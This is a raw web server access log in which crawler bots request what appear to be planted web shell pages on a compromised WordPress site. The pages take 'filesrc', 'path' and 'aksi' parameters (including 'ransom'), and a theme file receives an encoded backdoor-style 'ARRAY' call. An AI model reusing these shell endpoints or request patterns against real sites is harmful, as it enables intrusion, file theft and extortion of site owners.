216.73.216.154 - - [15/Jun/2025:08:05:32 -0400] "GET /glossiest/1457124466.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-links-opml.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 3192 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.175 - - [15/Jun/2025:08:05:32 -0400] "GET /biparous836481088.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fbundles%2Fjs HTTP/1.1" 200 2690 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:05:32 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fsmartd.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 12316 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.154 - - [15/Jun/2025:08:05:33 -0400] "GET /glaeosporium/oo/1410272046.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-blog-header.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 2322 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
51.222.253.9 - - [15/Jun/2025:08:05:33 -0400] "GET /sitemap-item-1212.xml HTTP/1.1" 200 12682 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
20.171.207.66 - - [15/Jun/2025:08:05:33 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fsetquota.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3845 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:05:33 -0400] "GET /aquilegia836469328.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Funinstall.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system HTTP/1.1" 200 2333 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:05:34 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Ffdformat.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3061 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:05:34 -0400] "GET /cuskin836627940.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fpublic%2Fjs HTTP/1.1" 200 2549 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.154 - - [15/Jun/2025:08:05:35 -0400] "GET /annulus/u1457068686.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-config-sample.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 3225 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.66 - - [15/Jun/2025:08:05:35 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fgenl.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 2884 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:05:35 -0400] "GET /revile231955198.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fpublic%2Fjs HTTP/1.1" 200 2551 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:05:36 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Frotatelogs.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 5490 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:05:37 -0400] "GET /revile231955198.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes%2Fclass-disqus-api-service.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes HTTP/1.1" 200 3168 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:05:38 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fplymouthd.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.222.253.16 - - [15/Jun/2025:08:05:38 -0400] "GET /sitemap-item-1217.xml HTTP/1.1" 200 12515 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
20.171.207.175 - - [15/Jun/2025:08:05:38 -0400] "GET /cuskin836627940.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes%2Fclass-disqus-api-service.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes HTTP/1.1" 200 3168 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:05:39 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Frdma.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3375 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:05:39 -0400] "GET /biparous836481088.shtml?aksi=buatfolder&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin HTTP/1.1" 200 2121 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.154 - - [15/Jun/2025:08:05:39 -0400] "GET /tipuliformis/detail/d1461978504.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Findex.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 10993 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.175 - - [15/Jun/2025:08:05:40 -0400] "GET /aquilegia836469328.shtml?aksi=buatfile&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fpublic HTTP/1.1" 200 2676 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:05:40 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fsetfont.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 4949 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.154 - - [15/Jun/2025:08:05:40 -0400] "GET /schismatizing1456312834.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-links-opml.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 3192 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
34.234.197.175 - - [15/Jun/2025:08:05:40 -0400] "GET /?filesrc=//lib64/libmcpp.so.0.3.0&path=//lib64 HTTP/1.1" 200 87111 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.66 - - [15/Jun/2025:08:05:41 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fpolkitd.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3129 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:05:41 -0400] "GET /aquilegia836469328.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes HTTP/1.1" 200 2626 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.154 - - [15/Jun/2025:08:05:41 -0400] "GET /bloodlet/1464045114.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-trackback.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 3878 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
51.222.253.4 - - [15/Jun/2025:08:05:42 -0400] "GET /sitemap-item-1218.xml HTTP/1.1" 200 12533 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
162.0.232.193 - - [15/Jun/2025:08:04:03 -0400] "GET /wp-content/themes/twentynineteen/sass/layout/layout/index.php?ARRAY=7o2230223n313734393939323634332p2231223n22687474703n5p2s5p2s7n7331393176313379612r63616p776973652r626s6174735p2s3s6p633q7068705s636s64655s6n6326743q313734393938393034332q3930613365333838353039393165643533663661666463376465393935343836222p2232223n223234336632316336393733616437393438653632616638643836363463346466222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33332q36302q36382q37332q38372q3135227q HTTP/1.1" 200 0 "-" "-"
20.171.207.175 - - [15/Jun/2025:08:05:42 -0400] "GET /biparous836481088.shtml?path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes HTTP/1.1" 200 2626 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:05:42 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Flogsave.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 2955 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.154 - - [15/Jun/2025:08:05:42 -0400] "GET /triennially/j1457152856.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-config-sample.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 3225 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.175 - - [15/Jun/2025:08:05:44 -0400] "GET /biparous836481088.shtml?aksi=ransom&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fbundles%2Fjs HTTP/1.1" 200 2690 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:05:44 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Flogrotate.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 9175 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.154 - - [15/Jun/2025:08:05:44 -0400] "GET /dingy/1463916928.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-load.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 3807 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.175 - - [15/Jun/2025:08:05:45 -0400] "GET /biparous836481088.shtml?aksi=buatfolder&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fbundles%2Fjs HTTP/1.1" 200 2140 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:05:46 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fscsi_start.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 2903 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.154 - - [15/Jun/2025:08:05:46 -0400] "GET /alcahest/p1455116868.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-config-sample.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 3225 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.175 - - [15/Jun/2025:08:05:47 -0400] "GET /aquilegia836469328.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fpublic%2Fclass-disqus-public.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fpublic HTTP/1.1" 200 4888 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:05:47 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fsudoreplay.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 6568 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.154 - - [15/Jun/2025:08:05:47 -0400] "GET /clamorously1467816858.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-settings.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 7688 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.66 - - [15/Jun/2025:08:05:49 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fidmapd.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3622 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.222.253.16 - - [15/Jun/2025:08:05:49 -0400] "GET /sitemap-item-1302.xml HTTP/1.1" 200 12540 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
20.171.207.175 - - [15/Jun/2025:08:05:49 -0400] "GET /revile231955198.shtml?aksi=buatfile&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fpublic%2Fpartials HTTP/1.1" 200 2546 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.154 - - [15/Jun/2025:08:05:49 -0400] "GET /reject/mgq/1429126650.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fsearch.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 1998 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
216.73.216.154 - - [15/Jun/2025:08:05:50 -0400] "GET /incumbencies1466211300.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-settings.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 7688 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.66 - - [15/Jun/2025:08:05:50 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fiftop.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 6666 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:05:50 -0400] "GET /biparous836481088.shtml?aksi=ransom&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fpartials HTTP/1.1" 200 2622 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:05:52 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fip-monitor.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3509 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.154 - - [15/Jun/2025:08:05:52 -0400] "GET /surmised/519769780.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-config-sample.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 3225 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.175 - - [15/Jun/2025:08:05:53 -0400] "GET /biparous836481088.shtml?aksi=ransom&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fpublic%2Fpartials HTTP/1.1" 200 2546 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:05:53 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fchcpu.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3380 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
23.21.228.180 - - [15/Jun/2025:08:05:52 -0400] "GET /?filesrc=//lib64/libisl.so.13.1.0&path=//lib64 HTTP/1.1" 200 568008 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.222.253.6 - - [15/Jun/2025:08:05:53 -0400] "GET /sitemap-item-1317.xml HTTP/1.1" 200 12439 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.154 - - [15/Jun/2025:08:05:54 -0400] "GET /quarrelsome1465038946.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fxmlrpc.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 3455 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.66 - - [15/Jun/2025:08:05:54 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fpure-certd.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3301 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:05:55 -0400] "GET /aquilegia836469328.shtml?aksi=ransom&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fbundles HTTP/1.1" 200 2478 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.154 - - [15/Jun/2025:08:05:55 -0400] "GET /highering1410396976.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fxmlrpc.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com HTTP/1.1" 200 3455 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; [email protected])"
20.171.207.66 - - [15/Jun/2025:08:05:56 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fauvirt.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3804 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:05:57 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fpam_group.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3507 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:05:57 -0400] "GET /biparous836481088.shtml?aksi=buatfile&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fadmin%2Fbundles HTTP/1.1" 200 2478 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.222.253.3 - - [15/Jun/2025:08:05:58 -0400] "GET /sitemap-item-1338.xml HTTP/1.1" 200 12479 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
20.171.207.66 - - [15/Jun/2025:08:05:58 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Ftelinit.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3164 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:05:59 -0400] "GET /aquilegia836469328.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes%2Fclass-disqus-api-service.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes HTTP/1.1" 200 3168 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:00 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fpam_issue.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 3427 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:00 -0400] "GET /biparous836481088.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes%2Fclass-disqus-api-service.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes HTTP/1.1" 200 3168 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.66 - - [15/Jun/2025:08:06:01 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Frdisc.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 4019 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.175 - - [15/Jun/2025:08:06:02 -0400] "GET /biparous836481088.shtml?filesrc=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes%2Fclass-disqus-deactivator.php&path=%2Fhome%2Fhonehdyv%2Freadbtooom.com%2Fwp-content%2Fplugins%2Fdisqus-comment-system%2Fincludes HTTP/1.1" 200 2338 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.222.253.4 - - [15/Jun/2025:08:06:02 -0400] "GET /sitemap-item-1370.xml HTTP/1.1" 200 12431 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
20.171.207.66 - - [15/Jun/2025:08:06:03 -0400] "GET /?filesrc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8%2Fgroupadd.8.gz&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Fshare%2Fman%2Fman8 HTTP/1.1" 200 4612 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
162.0.232.193 - - [15/Jun/2025:08:04:24 -0400] "GET /wp-content/themes/twentynineteen/sass/layout/layout/index.php?ARRAY=7o2230223n313734393939323636342p2231223n22687474703n5p2s5p2s7n7331393176313379612r63616p776973652r626s6174735p2s3s6p633q7068705s636s64655s6n6326743q313734393938393036342q3436383137386666333163373766323232343461373862363265663461666439222p2232223n223234336632316336393733616437393438653632616638643836363463346466222p2233223n226638613531633563383166656138353739393038393634373032363437643264222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232382q33332q36302q36382q37332q38372q3135227q HTTP/1.1" 200 0 "-" "-"
